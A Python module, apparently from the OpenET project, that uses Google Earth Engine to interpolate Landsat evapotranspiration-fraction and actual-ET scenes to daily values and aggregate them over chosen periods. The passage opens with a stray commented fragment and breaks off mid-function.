# # The composite image time will be 0 UTC (not Landsat time)
# agg_coll = ee.ImageCollection.fromImages(ftr.get('join'))
#
# # if agg_type.lower() == 'mean':
# agg_img = agg_coll.mean()
# # elif agg_type.lower() == 'median':
# # agg_img = agg_coll.median()
#
# return agg_img.set({
# 'system:index': ftr.get('system:index'),
# 'system:time_start': ftr.get('system:time_start'),
# 'date': ftr.get('date'),
# })
#
# return ee.ImageCollection(join_coll.map(aggregate_func))
| 42.723037 | 87 | 0.625273 | import datetime
import logging
import ee
from dateutil.relativedelta import *
from . import utils
# import openet.core.utils as utils
def daily(target_coll, source_coll, interp_days=32, interp_method='linear',
          use_joins=False, compute_product=False):
    """Interpolate non-daily source images to a daily target image collection

    Parameters
    ----------
    target_coll : ee.ImageCollection
        Source images will be interpolated to each target image time_start.
        Target images should have a daily time step.  This will typically be
        the reference ET (ETr) collection.
    source_coll : ee.ImageCollection
        Images that will be interpolated to the target image collection.
        This will typically be the fraction of reference ET (ETrF) collection.
    interp_days : int, optional
        Number of days before and after each image date to include in the
        interpolation (the default is 32).
    interp_method : {'linear'}, optional
        Interpolation method (the default is 'linear').
    use_joins : bool, optional
        If True, the source collection will be joined to the target collection
        before mapping/interpolation and the source images will be extracted
        from the join properties ('prev' and 'next').
        Setting use_joins=True should be more memory efficient.
        If False, the source images will be built by filtering the source
        collection separately for each image in the target collection
        (inside the mapped function).
    compute_product : bool, optional
        If True, compute the product of the target and all source image bands.
        The default is False.

    Returns
    -------
    ee.ImageCollection() of daily interpolated images

    Raises
    ------
    ValueError
        If `interp_method` is not a supported method.

    """
    prev_filter = ee.Filter.And(
        ee.Filter.maxDifference(
            difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
            leftField='system:time_start',
            rightField='system:time_start',
        ),
        ee.Filter.greaterThan(
            leftField='system:time_start',
            rightField='system:time_start',
        )
    )
    next_filter = ee.Filter.And(
        ee.Filter.maxDifference(
            difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
            leftField='system:time_start',
            rightField='system:time_start',
        ),
        ee.Filter.lessThanOrEquals(
            leftField='system:time_start',
            rightField='system:time_start',
        )
    )

    if use_joins:
        # Join the neighboring Landsat images in time
        target_coll = ee.ImageCollection(
            ee.Join.saveAll(
                matchesKey='prev',
                ordering='system:time_start',
                ascending=True,
                outer=True,
            ).apply(
                primary=target_coll,
                secondary=source_coll,
                condition=prev_filter,
            )
        )
        target_coll = ee.ImageCollection(
            ee.Join.saveAll(
                matchesKey='next',
                ordering='system:time_start',
                ascending=False,
                outer=True,
            ).apply(
                primary=target_coll,
                secondary=source_coll,
                condition=next_filter,
            )
        )

    # # DEADBEEF - This module is assuming that the time band is already in
    # #   the source collection.
    # # Uncomment the following to add a time band here instead.
    # def add_utc0_time_band(image):
    #     date_0utc = utils.date_0utc(ee.Date(image.get('system:time_start')))
    #     return image.addBands([
    #         image.select([0]).double().multiply(0).add(date_0utc.millis())\
    #             .rename(['time'])])
    # source_coll = ee.ImageCollection(source_coll.map(add_utc0_time_band))

    if interp_method.lower() == 'linear':
        def _linear(image):
            """Linearly interpolate source images to target image time_start(s)

            Parameters
            ----------
            image : ee.Image.
                The first band in the image will be used as the "target" image
                and will be returned with the output image.

            Returns
            -------
            ee.Image of interpolated values with band name 'src'

            Notes
            -----
            The source collection images must have a time band.
            This function is intended to be mapped over an image collection and
            can only take one input parameter.

            """
            # target_img = ee.Image(image).select(0).double()
            target_date = ee.Date(image.get('system:time_start'))

            # All filtering will be done based on 0 UTC dates
            utc0_date = utils.date_0utc(target_date)
            # utc0_time = target_date.update(hour=0, minute=0, second=0)\
            #     .millis().divide(1000).floor().multiply(1000)
            time_img = ee.Image.constant(utc0_date.millis()).double()

            # Build nodata images/masks that can be placed at the front/back of
            #   of the qm image collections in case the collections are empty.
            bands = source_coll.first().bandNames()
            prev_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
                .double().rename(bands).updateMask(0)\
                .set({
                    'system:time_start': utc0_date.advance(
                        -interp_days - 1, 'day').millis()})
            next_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
                .double().rename(bands).updateMask(0)\
                .set({
                    'system:time_start': utc0_date.advance(
                        interp_days + 2, 'day').millis()})

            if use_joins:
                # Build separate mosaics for before and after the target date
                prev_qm_img = ee.ImageCollection\
                    .fromImages(ee.List(ee.Image(image).get('prev')))\
                    .merge(ee.ImageCollection(prev_qm_mask))\
                    .sort('system:time_start', True)\
                    .mosaic()
                next_qm_img = ee.ImageCollection\
                    .fromImages(ee.List(ee.Image(image).get('next')))\
                    .merge(ee.ImageCollection(next_qm_mask))\
                    .sort('system:time_start', False)\
                    .mosaic()
            else:
                # Build separate collections for before and after the target date
                prev_qm_coll = source_coll\
                    .filterDate(utc0_date.advance(-interp_days, 'day'), utc0_date)\
                    .merge(ee.ImageCollection(prev_qm_mask))
                next_qm_coll = source_coll\
                    .filterDate(utc0_date, utc0_date.advance(interp_days + 1, 'day'))\
                    .merge(ee.ImageCollection(next_qm_mask))

                # Flatten the previous/next collections to single images
                # The closest image in time should be on "top"
                # CGM - Is the previous collection already sorted?
                # prev_qm_img = prev_qm_coll.mosaic()
                prev_qm_img = prev_qm_coll.sort('system:time_start', True)\
                    .mosaic()
                next_qm_img = next_qm_coll.sort('system:time_start', False)\
                    .mosaic()

            # DEADBEEF - It might be easier to interpolate all bands instead of
            #   separating the value and time bands
            # prev_value_img = ee.Image(prev_qm_img).double()
            # next_value_img = ee.Image(next_qm_img).double()

            # Interpolate all bands except the "time" band
            prev_bands = prev_qm_img.bandNames()\
                .filter(ee.Filter.notEquals('item', 'time'))
            next_bands = next_qm_img.bandNames()\
                .filter(ee.Filter.notEquals('item', 'time'))
            prev_value_img = ee.Image(prev_qm_img.select(prev_bands)).double()
            next_value_img = ee.Image(next_qm_img.select(next_bands)).double()
            prev_time_img = ee.Image(prev_qm_img.select('time')).double()
            next_time_img = ee.Image(next_qm_img.select('time')).double()

            # Fill masked values with values from the opposite image
            # Something like this is needed to ensure there are always two
            #   values to interpolate between
            # For data gaps, this will cause a flat line instead of a ramp
            prev_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
                next_time_img, prev_time_img]).mosaic())
            next_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
                prev_time_img, next_time_img]).mosaic())
            prev_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
                next_value_img, prev_value_img]).mosaic())
            next_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
                prev_value_img, next_value_img]).mosaic())

            # Calculate time ratio of the current image between other cloud free images
            time_ratio_img = time_img.subtract(prev_time_mosaic)\
                .divide(next_time_mosaic.subtract(prev_time_mosaic))

            # Interpolate values to the current image time
            interp_img = next_value_mosaic.subtract(prev_value_mosaic)\
                .multiply(time_ratio_img).add(prev_value_mosaic)

            # Pass the target image back out as a new band
            target_img = image.select([0]).double()
            output_img = interp_img.addBands([target_img])

            # TODO: Come up with a dynamic way to name the "product" bands
            # The product bands will have a "_1" appended to the name
            #   i.e. "et_fraction" -> "et_fraction_1"
            if compute_product:
                output_img = output_img\
                    .addBands([interp_img.multiply(target_img)])

            return output_img.set({
                'system:index': image.get('system:index'),
                'system:time_start': image.get('system:time_start'),
                # 'system:time_start': utc0_time,
            })

        interp_coll = ee.ImageCollection(target_coll.map(_linear))
    # elif interp_method.lower() == 'nearest':
    #     interp_coll = ee.ImageCollection(target_coll.map(_nearest))
    else:
        raise ValueError('invalid interpolation method: {}'.format(interp_method))

    return interp_coll
# @deprecated
def aggregate_daily(image_coll, start_date=None, end_date=None,
                    agg_type='mean'):
    """Deprecated alias for :func:`aggregate_to_daily`.

    Kept only for backward compatibility; new code should call
    aggregate_to_daily() directly.
    """
    return aggregate_to_daily(
        image_coll=image_coll,
        start_date=start_date,
        end_date=end_date,
        agg_type=agg_type,
    )
def aggregate_to_daily(image_coll, start_date=None, end_date=None,
                       agg_type='mean'):
    """Aggregate images by day without using joins
    The primary purpose of this function is to join separate Landsat images
    from the same path into a single daily image.
    Parameters
    ----------
    image_coll : ee.ImageCollection
        Input image collection.
    start_date :  date, number, string, optional
        Start date.
        Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
    end_date :  date, number, string, optional
        Exclusive end date.
        Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
    agg_type : {'mean'}, optional
        Aggregation type (the default is 'mean').
        Currently only a 'mean' aggregation type is supported.
    Returns
    -------
    ee.ImageCollection()
    Notes
    -----
    This function should be used to mosaic Landsat images from same path
    but different rows.
    system:time_start of returned images will be 0 UTC (not the image time).
    """
    # Build a date-filtered collection only for discovering which dates exist;
    # the per-day aggregation below still pulls from the full image_coll.
    if start_date and end_date:
        test_coll = image_coll.filterDate(ee.Date(start_date), ee.Date(end_date))
    elif start_date:
        test_coll = image_coll.filter(ee.Filter.greaterThanOrEquals(
            'system:time_start', ee.Date(start_date).millis()))
    elif end_date:
        test_coll = image_coll.filter(ee.Filter.lessThan(
            'system:time_start', ee.Date(end_date).millis()))
    else:
        test_coll = image_coll
    # Build a sorted list of the unique "dates" in the image_coll
    date_list = ee.List(test_coll.aggregate_array('system:time_start'))\
        .map(lambda time: ee.Date(ee.Number(time)).format('yyyy-MM-dd'))\
        .distinct().sort()
    def aggregate_func(date_str):
        # These local names intentionally shadow the outer start_date/end_date
        # parameters; they refer to the single day being aggregated.
        start_date = ee.Date(ee.String(date_str))
        end_date = start_date.advance(1, 'day')
        agg_coll = image_coll.filterDate(start_date, end_date)
        # The agg_type check runs client-side while the collection is mapped
        if agg_type.lower() == 'mean':
            agg_img = agg_coll.mean()
        # elif agg_type.lower() == 'median':
        #     agg_img = agg_coll.median()
        else:
            raise ValueError(f'unsupported agg_type "{agg_type}"')
        return agg_img.set({
            'system:index': start_date.format('yyyyMMdd'),
            'system:time_start': start_date.millis(),
            'date': start_date.format('yyyy-MM-dd'),
        })
    return ee.ImageCollection(date_list.map(aggregate_func))
def from_scene_et_fraction(scene_coll, start_date, end_date, variables,
                           interp_args, model_args, t_interval='custom',
                           use_joins=False,
                           ):
    """Interpolate from a precomputed collection of Landsat ET fraction scenes
    Parameters
    ----------
    scene_coll : ee.ImageCollection
        Non-daily 'et_fraction' images that will be interpolated.
    start_date : str
        ISO format start date.
    end_date : str
        ISO format end date (exclusive, passed directly to .filterDate()).
    variables : list
        List of variables that will be returned in the Image Collection.
    interp_args : dict
        Parameters from the INTERPOLATE section of the INI file.
        # TODO: Look into a better format for showing the options
        interp_method : {'linear}, optional
            Interpolation method. The default is 'linear'.
        interp_days : int, str, optional
            Number of extra days before the start date and after the end date
            to include in the interpolation calculation. The default is 32.
    model_args : dict
        Parameters from the MODEL section of the INI file. The reference
        source and parameters will need to be set here if computing
        reference ET or actual ET.
    t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
        Time interval over which to interpolate and aggregate values
        The default is 'custom' which means the aggregation time period
        will be controlled by the start and end date parameters.
    use_joins : bool, optional
        If True, use joins to link the target and source collections.
        If False, the source collection will be filtered for each target image.
        This parameter is passed through to interpolate.daily().
    Returns
    -------
    ee.ImageCollection
    Raises
    ------
    ValueError
    Notes
    -----
    This function currently assumes that "mask" and "time" bands already exist
    in the scene collection.
    """
    # Get interp_method
    if 'interp_method' in interp_args.keys():
        interp_method = interp_args['interp_method']
    else:
        interp_method = 'linear'
        logging.debug('interp_method was not set, default to "linear"')
    # Get interp_days
    if 'interp_days' in interp_args.keys():
        interp_days = interp_args['interp_days']
    else:
        interp_days = 32
        logging.debug('interp_days was not set, default to 32')
    # Check that the input parameters are valid
    if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
        raise ValueError('unsupported t_interval: {}'.format(t_interval))
    elif interp_method.lower() not in ['linear']:
        raise ValueError('unsupported interp_method: {}'.format(
            interp_method))
    # Coerce numeric strings/floats to int before validating the value
    if ((type(interp_days) is str or type(interp_days) is float) and
            utils.is_number(interp_days)):
        interp_days = int(interp_days)
    elif not type(interp_days) is int:
        raise TypeError('interp_days must be an integer')
    elif interp_days <= 0:
        raise ValueError('interp_days must be a positive integer')
    if not variables:
        raise ValueError('variables parameter must be set')
    # Adjust start/end dates based on t_interval
    # Increase the date range to fully include the time interval
    start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
    end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
    if t_interval.lower() == 'annual':
        start_dt = datetime.datetime(start_dt.year, 1, 1)
        # Convert end date to inclusive, flatten to beginning of year,
        # then add a year which will make it exclusive
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, 1, 1)
        end_dt += relativedelta(years=+1)
    elif t_interval.lower() == 'monthly':
        start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
        end_dt += relativedelta(months=+1)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')
    # The start/end date for the interpolation include more days
    # (+/- interp_days) than are included in the ETr collection
    interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
    interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
    interp_start_date = interp_start_dt.date().isoformat()
    interp_end_date = interp_end_dt.date().isoformat()
    # Get reference ET source
    if 'et_reference_source' in model_args.keys():
        et_reference_source = model_args['et_reference_source']
    else:
        raise ValueError('et_reference_source was not set')
    # Get reference ET band name
    if 'et_reference_band' in model_args.keys():
        et_reference_band = model_args['et_reference_band']
    else:
        raise ValueError('et_reference_band was not set')
    # Get reference ET factor
    if 'et_reference_factor' in model_args.keys():
        et_reference_factor = model_args['et_reference_factor']
    else:
        et_reference_factor = 1.0
        logging.debug('et_reference_factor was not set, default to 1.0')
        # raise ValueError('et_reference_factor was not set')
    # CGM - Resampling is not working correctly so commenting out for now
    # # Get reference ET resample
    # if 'et_reference_resample' in model_args.keys():
    #     et_reference_resample = model_args['et_reference_resample']
    # else:
    #     et_reference_resample = 'nearest'
    #     logging.debug(
    #         'et_reference_resample was not set, default to nearest')
    #     # raise ValueError('et_reference_resample was not set')
    if type(et_reference_source) is str:
        # Assume a string source is an single image collection ID
        # not an list of collection IDs or ee.ImageCollection
        daily_et_ref_coll = ee.ImageCollection(et_reference_source) \
            .filterDate(start_date, end_date) \
            .select([et_reference_band], ['et_reference'])
    # elif isinstance(et_reference_source, computedobject.ComputedObject):
    #     # Interpret computed objects as image collections
    #     daily_et_reference_coll = et_reference_source \
    #         .filterDate(self.start_date, self.end_date) \
    #         .select([et_reference_band])
    else:
        raise ValueError('unsupported et_reference_source: {}'.format(
            et_reference_source))
    # Scale reference ET images (if necessary)
    # CGM - Resampling is not working correctly so not including for now
    if (et_reference_factor and et_reference_factor != 1):
        def et_reference_adjust(input_img):
            # Multiply preserves properties, but system:time_start must be
            # reset explicitly since copyProperties drops system properties
            return input_img.multiply(et_reference_factor) \
                .copyProperties(input_img) \
                .set({'system:time_start': input_img.get('system:time_start')})
        daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
    # Initialize variable list to only variables that can be interpolated
    interp_vars = ['et_fraction', 'ndvi']
    interp_vars = list(set(interp_vars) & set(variables))
    # To return ET, the ETf must be interpolated
    if 'et' in variables and 'et_fraction' not in interp_vars:
        interp_vars.append('et_fraction')
    # With the current interpolate.daily() function,
    # something has to be interpolated in order to return et_reference
    if 'et_reference' in variables and 'et_fraction' not in interp_vars:
        interp_vars.append('et_fraction')
    # The time band is always needed for interpolation
    interp_vars.append('time')
    # TODO: Look into implementing et_fraction clamping here
    # (similar to et_actual below)
    # Filter scene collection to the interpolation range
    # This probably isn't needed since scene_coll was built to this range
    scene_coll = scene_coll.filterDate(interp_start_date, interp_end_date)
    # For count, compute the composite/mosaic image for the mask band only
    # NOTE: aggregate_coll is only defined inside this branch; it is safe
    # because aggregate_image() below only references it when 'count' is
    # also in variables.
    if 'count' in variables:
        aggregate_coll = aggregate_to_daily(
            image_coll = scene_coll.select(['mask']),
            start_date=start_date, end_date=end_date)
        # The following is needed because the aggregate collection can be
        # empty if there are no scenes in the target date range but there
        # are scenes in the interpolation date range.
        # Without this the count image will not be built but the other
        # bands will be which causes a non-homogeneous image collection.
        # NOTE(review): .merge() is passed an ee.Image rather than an
        # ImageCollection — presumably relies on implicit EE casting; confirm.
        aggregate_coll = aggregate_coll.merge(
            ee.Image.constant(0).rename(['mask'])
                .set({'system:time_start': ee.Date(start_date).millis()}))
    # Interpolate to a daily time step
    daily_coll = daily(
        target_coll=daily_et_ref_coll,
        source_coll=scene_coll.select(interp_vars),
        interp_method=interp_method, interp_days=interp_days,
        use_joins=use_joins,
        compute_product=False,
    )
    # The interpolate.daily() function can/will return the product of
    # the source and target image named as "{source_band}_1".
    # The problem with this approach is that is will drop any other bands
    # that are being interpolated (such as the ndvi).
    # daily_coll = daily_coll.select(['et_fraction_1'], ['et'])
    # Compute ET from ETf and ETr (if necessary)
    # This isn't needed if compute_product=True in daily() and band is renamed
    # The check for et_fraction is needed since it is back computed from ET and ETr
    # if 'et' in variables or 'et_fraction' in variables:
    def compute_et(img):
        """This function assumes ETr and ETf are present"""
        et_img = img.select(['et_fraction']) \
            .multiply(img.select(['et_reference']))
        return img.addBands(et_img.double().rename('et'))
    daily_coll = daily_coll.map(compute_et)
    def aggregate_image(agg_start_date, agg_end_date, date_format):
        """Aggregate the daily images within the target date range
        Parameters
        ----------
        agg_start_date: ee.Date, str
            Start date (inclusive).
        agg_end_date : ee.Date, str
            End date (exclusive).
        date_format : str
            Date format for system:index (uses EE JODA format).
        Returns
        -------
        ee.Image
        Notes
        -----
        Since this function takes multiple inputs it is being called
        for each time interval by separate mappable functions
        """
        if 'et' in variables or 'et_fraction' in variables:
            et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
                .select(['et']).sum()
        if 'et_reference' in variables or 'et_fraction' in variables:
            # et_reference_img = daily_coll \
            et_reference_img = daily_et_ref_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['et_reference']).sum()
        image_list = []
        if 'et' in variables:
            image_list.append(et_img.float())
        if 'et_reference' in variables:
            image_list.append(et_reference_img.float())
        if 'et_fraction' in variables:
            # Compute average et fraction over the aggregation period
            image_list.append(
                et_img.divide(et_reference_img).rename(
                    ['et_fraction']).float())
        if 'ndvi' in variables:
            # Compute average ndvi over the aggregation period
            ndvi_img = daily_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .mean().select(['ndvi']).float()
            image_list.append(ndvi_img)
        if 'count' in variables:
            count_img = aggregate_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['mask']).sum().rename('count').uint8()
            image_list.append(count_img)
        return ee.Image(image_list) \
            .set({
                'system:index': ee.Date(agg_start_date).format(date_format),
                'system:time_start': ee.Date(agg_start_date).millis()})
        #     .set(interp_properties) \
    # Combine input, interpolated, and derived values
    if t_interval.lower() == 'daily':
        def agg_daily(daily_img):
            # CGM - Double check that this time_start is a 0 UTC time.
            # It should be since it is coming from the interpolate source
            # collection, but what if source is GRIDMET (+6 UTC)?
            agg_start_date = ee.Date(daily_img.get('system:time_start'))
            # CGM - This calls .sum() on collections with only one image
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
                date_format='YYYYMMdd')
        return ee.ImageCollection(daily_coll.map(agg_daily))
    elif t_interval.lower() == 'monthly':
        def month_gen(iter_start_dt, iter_end_dt):
            # Yield the first day of each month in the range (client side)
            iter_dt = iter_start_dt
            # Conditional is "less than" because end date is exclusive
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(months=+1)
        month_list = ee.List(list(month_gen(start_dt, end_dt)))
        def agg_monthly(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
                date_format='YYYYMM')
        return ee.ImageCollection(month_list.map(agg_monthly))
    elif t_interval.lower() == 'annual':
        def year_gen(iter_start_dt, iter_end_dt):
            # Yield the first day of each year in the range (client side)
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(years=+1)
        year_list = ee.List(list(year_gen(start_dt, end_dt)))
        def agg_annual(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
                date_format='YYYY')
        return ee.ImageCollection(year_list.map(agg_annual))
    elif t_interval.lower() == 'custom':
        # Returning an ImageCollection to be consistent
        return ee.ImageCollection(aggregate_image(
            agg_start_date=start_date, agg_end_date=end_date,
            date_format='YYYYMMdd'))
def from_scene_et_actual(scene_coll, start_date, end_date, variables,
                         interp_args, model_args, t_interval='custom',
                         use_joins=False,
                         ):
    """Interpolate from a precomputed collection of Landsat actual ET scenes
    Parameters
    ----------
    scene_coll : ee.ImageCollection
        Non-daily 'et' images that will be interpolated.
    start_date : str
        ISO format start date.
    end_date : str
        ISO format end date (exclusive, passed directly to .filterDate()).
    variables : list
        List of variables that will be returned in the Image Collection.
    interp_args : dict
        Parameters from the INTERPOLATE section of the INI file.
        # TODO: Look into a better format for showing the options
        interp_source : str
        interp_band : str
        interp_resample : {'nearest', 'nearest'}
        interp_method : {'linear}, optional
            Interpolation method. The default is 'linear'.
        interp_days : int, str, optional
            Number of extra days before the start date and after the end date
            to include in the interpolation calculation. The default is 32.
        et_fraction_min : float
        et_fraction_max : float
    model_args : dict
        Parameters from the MODEL section of the INI file. The reference
        source and other parameters will need to be set here if computing
        reference ET or ET fraction.
    t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
        Time interval over which to interpolate and aggregate values
        The default is 'custom' which means the aggregation time period
        will be controlled by the start and end date parameters.
    use_joins : bool, optional
        If True, use joins to link the target and source collections.
        If False, the source collection will be filtered for each target image.
        This parameter is passed through to interpolate.daily().
    # TODO: Move these into interp_args (and/or model_args)
    fraction_min : float, optional
    fraction_max : float, optional
    Returns
    -------
    ee.ImageCollection
    Raises
    ------
    ValueError
    Notes
    -----
    This function currently assumes that "mask" and "time" bands already exist
    in the scene collection.
    """
    # Get interp_method
    if 'interp_method' in interp_args.keys():
        interp_method = interp_args['interp_method']
    else:
        interp_method = 'linear'
        logging.debug('interp_method was not set, default to "linear"')
    # Get interp_days
    if 'interp_days' in interp_args.keys():
        interp_days = interp_args['interp_days']
    else:
        interp_days = 32
        logging.debug('interp_days was not set, default to 32')
    # Check that the input parameters are valid
    if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
        raise ValueError('unsupported t_interval: {}'.format(t_interval))
    elif interp_method.lower() not in ['linear']:
        raise ValueError('unsupported interp_method: {}'.format(
            interp_method))
    # Coerce numeric strings/floats to int before validating the value
    if ((type(interp_days) is str or type(interp_days) is float) and
            utils.is_number(interp_days)):
        interp_days = int(interp_days)
    elif not type(interp_days) is int:
        raise TypeError('interp_days must be an integer')
    elif interp_days <= 0:
        raise ValueError('interp_days must be a positive integer')
    if not variables:
        raise ValueError('variables parameter must be set')
    # Adjust start/end dates based on t_interval
    # Increase the date range to fully include the time interval
    start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
    end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
    if t_interval.lower() == 'annual':
        start_dt = datetime.datetime(start_dt.year, 1, 1)
        # Convert end date to inclusive, flatten to beginning of year,
        # then add a year which will make it exclusive
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, 1, 1)
        end_dt += relativedelta(years=+1)
    elif t_interval.lower() == 'monthly':
        start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
        end_dt += relativedelta(months=+1)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')
    # The start/end date for the interpolation include more days
    # (+/- interp_days) than are included in the ETr collection
    interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
    interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
    interp_start_date = interp_start_dt.date().isoformat()
    interp_end_date = interp_end_dt.date().isoformat()
    # Get reference ET collection
    # NOTE: daily_et_ref_coll is only defined inside this branch; it is safe
    # because aggregate_image() below only references it under the same
    # condition on variables.
    if 'et_reference' in variables or 'et_fraction' in variables:
        if 'et_reference_source' not in model_args.keys():
            raise ValueError('et_reference_source was not set')
        if 'et_reference_band' not in model_args.keys():
            raise ValueError('et_reference_band was not set')
        # TODO: Check if model_args can be modified instead of making new variables
        if 'et_reference_factor' in model_args.keys():
            et_reference_factor = model_args['et_reference_factor']
        else:
            et_reference_factor = 1.0
            logging.debug('et_reference_factor was not set, default to 1.0')
            # raise ValueError('et_reference_factor was not set')
        # CGM - Resampling is not working correctly so commenting out for now
        # if 'et_reference_resample' in model_args.keys():
        #     et_reference_resample = model_args['et_reference_resample']
        # else:
        #     et_reference_resample = 'nearest'
        #     logging.debug(
        #         'et_reference_resample was not set, default to nearest')
        #     # raise ValueError('et_reference_resample was not set')
        # Assume a string source is an single image collection ID
        # not an list of collection IDs or ee.ImageCollection
        daily_et_ref_coll_id = model_args['et_reference_source']
        daily_et_ref_coll = ee.ImageCollection(daily_et_ref_coll_id) \
            .filterDate(start_date, end_date) \
            .select([model_args['et_reference_band']], ['et_reference'])
        # Scale reference ET images (if necessary)
        # CGM - Resampling is not working correctly so not including for now
        if (et_reference_factor and et_reference_factor != 1):
            def et_reference_adjust(input_img):
                # Multiply preserves properties, but system:time_start must
                # be reset explicitly (copyProperties drops system properties)
                return input_img.multiply(et_reference_factor) \
                    .copyProperties(input_img) \
                    .set({'system:time_start': input_img.get('system:time_start')})
            daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
    # TODO: Add code to fall back on the model_args reference ET parameters
    # if the interp source/band/resample parameters are not set.
    # Get the interpolation collection
    if 'interp_source' not in interp_args.keys():
        raise ValueError('interp_source was not set')
    if 'interp_band' not in interp_args.keys():
        raise ValueError('interp_band was not set')
    # CGM - Resampling is not working correctly so commenting out for now
    # if 'interp_resample' not in interp_args.keys():
    #     interp_args['interp_resample'] = 'nearest'
    #     logging.debug('interp_resample was not set, defaulting to nearest')
    #     # raise ValueError('interp_resample was not set')
    # CGM - Factor is not currently being applied so commenting out for now
    # if 'interp_factor' not in interp_args.keys():
    #     interp_args['interp_factor'] = 1.0
    #     logging.debug('interp_factor was not set, defaulting to 1.0')
    #     # raise ValueError('interp_factor was not set')
    # Target collection needs to be filtered to the same date range as the
    # scene collection in order to normalize the scenes.
    # It will be filtered again to the start/end when it is sent into
    # interpolate.daily()
    daily_target_coll = ee.ImageCollection(interp_args['interp_source']) \
        .filterDate(interp_start_date, interp_end_date) \
        .select([interp_args['interp_band']])
    # 'et' is normalized below; 'mask' and 'time' are carried along
    interp_vars = ['et'] + ['mask', 'time']
    # For count, compute the composite/mosaic image for the mask band only
    # NOTE: aggregate_coll is only defined inside this branch; it is safe
    # because aggregate_image() below only references it when 'count' is
    # also in variables.
    if 'count' in variables:
        aggregate_coll = aggregate_to_daily(
            image_coll=scene_coll.select(['mask']),
            start_date=start_date, end_date=end_date)
        # The following is needed because the aggregate collection can be
        # empty if there are no scenes in the target date range but there
        # are scenes in the interpolation date range.
        # Without this the count image will not be built but the other
        # bands will be which causes a non-homogeneous image collection.
        # NOTE(review): .merge() is passed an ee.Image rather than an
        # ImageCollection — presumably relies on implicit EE casting; confirm.
        aggregate_coll = aggregate_coll.merge(
            ee.Image.constant(0).rename(['mask'])
                .set({'system:time_start': ee.Date(start_date).millis()}))
    # It might be more efficient to join the target collection to the scenes
    def normalize_et(img):
        # Flatten the scene time to 0 UTC so it matches the daily target
        img_date = ee.Date(img.get('system:time_start')) \
            .update(hour=0, minute=0, second=0)
        # Truncate to whole seconds to avoid sub-second mismatch
        img_date = ee.Date(img_date.millis().divide(1000).floor().multiply(1000))
        target_img = ee.Image(daily_target_coll \
            .filterDate(img_date, img_date.advance(1, 'day')).first())
        # CGM - This is causing weird artifacts in the output images
        # if interp_args['interp_resample'].lower() in ['bilinear', 'bicubic']:
        #     target_img = target_img.resample(interp_args['interp_resample'])
        et_norm_img = img.select(['et']).divide(target_img).rename(['et_norm'])
        # Clamp the normalized ET image (et_fraction)
        if 'et_fraction_max' in interp_args.keys():
            et_norm_img = et_norm_img.min(float(interp_args['et_fraction_max']))
        if 'et_fraction_min' in interp_args.keys():
            et_norm_img = et_norm_img.max(float(interp_args['et_fraction_min']))
        # if ('et_fraction_min' in interp_args.keys() and
        #         'et_fraction_max' in interp_args.keys()):
        #     et_norm_img = et_norm_img.clamp(
        #         float(interp_args['et_fraction_min']),
        #         float(interp_args['et_fraction_max']))
        return img.addBands([
            et_norm_img.double(), target_img.rename(['norm'])])
    # The time band is always needed for interpolation
    scene_coll = scene_coll \
        .filterDate(interp_start_date, interp_end_date) \
        .select(interp_vars) \
        .map(normalize_et)
    # # Join the target (normalization) image to the scene images
    # if use_joins:
    #     prev_filter = ee.Filter.And(
    #         ee.Filter.maxDifference(
    #             difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
    #             leftField='system:time_start', rightField='system:time_start'),
    #         ee.Filter.greaterThan(leftField='system:time_start',
    #                               rightField='system:time_start')
    #     )
    #     scene_coll = ee.ImageCollection(
    #         ee.Join.saveFirst(matchKey='norm_img', ordering='system:time_start',
    #                           ascending=False)
    #         .apply(primary=scene_coll, secondary=target_coll,
    #                condition=prev_filter)
    #     )
    # Interpolate to a daily time step
    daily_coll = daily(
        target_coll=daily_target_coll.filterDate(start_date, end_date),
        source_coll=scene_coll.select(['et_norm', 'time']),
